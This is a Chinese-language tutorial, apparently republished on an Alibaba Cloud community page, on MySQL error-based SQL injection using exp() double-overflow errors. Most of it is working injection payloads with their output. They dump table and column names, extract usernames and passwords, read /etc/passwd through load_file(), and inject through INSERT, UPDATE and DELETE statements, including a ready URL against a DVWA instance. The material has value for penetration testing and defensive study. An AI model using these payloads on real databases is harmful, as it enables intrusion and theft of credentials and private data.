使用exp進行SQL報錯注入

來源:互聯網
上載者:User

標籤:sch   warning   oca   exp   div   利用   查詢   base   img   

0x01 前言概述

好訊息好訊息~作者又在MySQL中發現了一個Double型資料溢出。如果你想瞭解利用溢出來注出資料,你可以讀一下作者之前發的博文:BIGINT Overflow Error based injections,drops上面也有對應翻譯,具體見這裡。當我們拿到MySQL裡的函數時,作者比較感興趣的是其中的數學函數,它們也應該包含一些資料類型來儲存數值。所以作者就跑去測試看哪些函數會出現溢出錯誤。然後作者發現,當傳遞一個大於709的值時,函數exp()就會引起一個溢出錯誤。

mysql> select exp(709);+-----------------------+| exp(709)              |+-----------------------+| 8.218407461554972e307 |+-----------------------+1 row in set (0.00 sec) mysql> select exp(710);ERROR 1690 (22003): DOUBLE value is out of range in ‘exp(710)‘

在MySQL中,exp與ln和log的功能相反,簡單介紹下,就是log和ln都返回以e為底數的對數,見等式:

 

mysql> select log(15);+------------------+| log(15)          |+------------------+| 2.70805020110221 |+------------------+1 row in set (0.00 sec) mysql> select ln(15);+------------------+| ln(15)           |+------------------+| 2.70805020110221 |+------------------+1 row in set (0.00 sec)

指數函數為對數函數的反函數,exp()即為以e為底的對數函數,如等式:

 

mysql> select exp(2.70805020110221);+-----------------------+| exp(2.70805020110221) |+-----------------------+|                    15 |+-----------------------+1 row in set (0.00 sec)
0x02 注入

當涉及到注入時,我們使用否定查詢來造成“DOUBLE value is out of range”的錯誤。作者之前的博文提到的,將0按位取反就會返回“18446744073709551615”,再加上函數成功執行後返回0的緣故,我們將成功執行的函數取反就會得到最大的無符號BIGINT值。

mysql> select ~0;+----------------------+| ~0                   |+----------------------+| 18446744073709551615 |+----------------------+1 row in set (0.00 sec) mysql> select ~(select version());+----------------------+| ~(select version())  |+----------------------+| 18446744073709551610 |+----------------------+1 row in set, 1 warning (0.00 sec)

我們通過子查詢與按位求反,造成一個DOUBLE overflow error,並藉由此注出資料。

>`exp(~(select*from(select user())x))`    mysql> select exp(~(select*from(select user())x));    ERROR 1690 (22003): DOUBLE value is out of range in ‘exp(~((select ‘[email protected]‘ from dual)))‘
0x03 注出資料

得到表名:

select exp(~(select*from(select table_name from information_schema.tables where table_schema=database() limit 0,1)x));

得到列名:

select exp(~(select*from(select column_name from information_schema.columns where table_name=‘users‘ limit 0,1)x));

檢索資料:

select exp(~ (select*from(select concat_ws(‘:‘,id, username, password) from users limit 0,1)x));
0x04 一蹴而就

這個查詢可以從當前的上下文中dump出所有的tables與columns。我們也可以dump出所有的資料庫,但由於我們是通過一個錯誤進行提取,它會返回很少的結果。

exp(~(select*from(select(concat(@:=0,(select count(*)from`information_schema`.columns where table_schema=database()[email protected]:=concat(@,0xa,table_schema,0x3a3a,table_name,0x3a3a,column_name)),@)))x))http://localhost/dvwa/vulnerabilities/sqli/?id=1‘ or exp(~(select*from(select(concat(@:=0,(select count(*)from`information_schema`.columns where table_schema=database()[email protected]:=concat(@,0xa,table_schema,0x3a3a,table_name,0x3a3a,column_name)),@)))x))-- -&Submit=Submit#

 

0x04 讀取檔案

你可以通過load_file()函數來讀取檔案,但作者發現有13行的限制,該語句也可以在BIGINT overflow injections中使用。

select exp(~(select*from(select load_file(‘/etc/passwd‘))a));

 

注意,你無法寫檔案,因為這個錯入寫入的只是0。

mysql> select exp(~(select*from(select ‘hello‘)a)) into outfile ‘C:/out.txt‘;ERROR 1690 (22003): DOUBLE value is out of range in ‘exp(~((select ‘hello‘ from dual)))‘    # type C:\out.txt0
0x05 Injection in Insert

按部就班就好

mysql> insert into users (id, username, password) values (2, ‘‘ ^ exp(~(select*from(select user())x)), ‘Eyre‘);ERROR 1690 (22003): DOUBLE value is out of range in ‘exp(~((select ‘[email protected]‘ from dual)))‘

對於所有的insert,update和delete語句DIOS查詢也同樣可以使用。

mysql> insert into users (id, username, password) values (2, ‘‘ | exp(~(select*from(select(concat(@:=0,(select count(*)from`information_schema`.columns where table_schema=database()[email protected]:=concat(@,0xa,table_schema,0x3a3a,table_name,0x3a3a,column_name)),@)))x)), ‘Eyre‘);ERROR 1690 (22003): DOUBLE value is out of range in ‘exp(~((select ‘000newdb::users::idnewdb::users::usernamenewdb::users::password‘ from dual)))‘
0x06 Injection in Update
mysql> update users set password=‘Peter‘ ^ exp(~(select*from(select user())x)) where id=4;ERROR 1690 (22003): DOUBLE value is out of range in ‘exp(~((select ‘[email protected]‘ from dual)))‘
0x07 Injection in Delete
mysql> delete from users where id=‘1‘ | exp(~(select*from(select user())x));ERROR 1690 (22003): DOUBLE value is out of range in ‘exp(~((select ‘[email protected]‘ from dual)))‘
0x08 總結

和前面的BIGINT注入一樣,exp注入也適用於MySQL5.5.5及以上版本。以前的版本對於此情況則是“一言不發”。

mysql> select version();+---------------------+| version()           |+---------------------+| 5.0.45-community-nt |+---------------------+1 row in set (0.00 sec) mysql> select exp(710);+----------+| exp(710) |+----------+|   1.#INF |+----------+1 row in set (0.00 sec) mysql> select exp(~0);+---------+| exp(~0) |+---------+|  1.#INF |+---------+1 row in set (0.00 sec)

 

使用exp進行SQL報錯注入

聯繫我們

該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.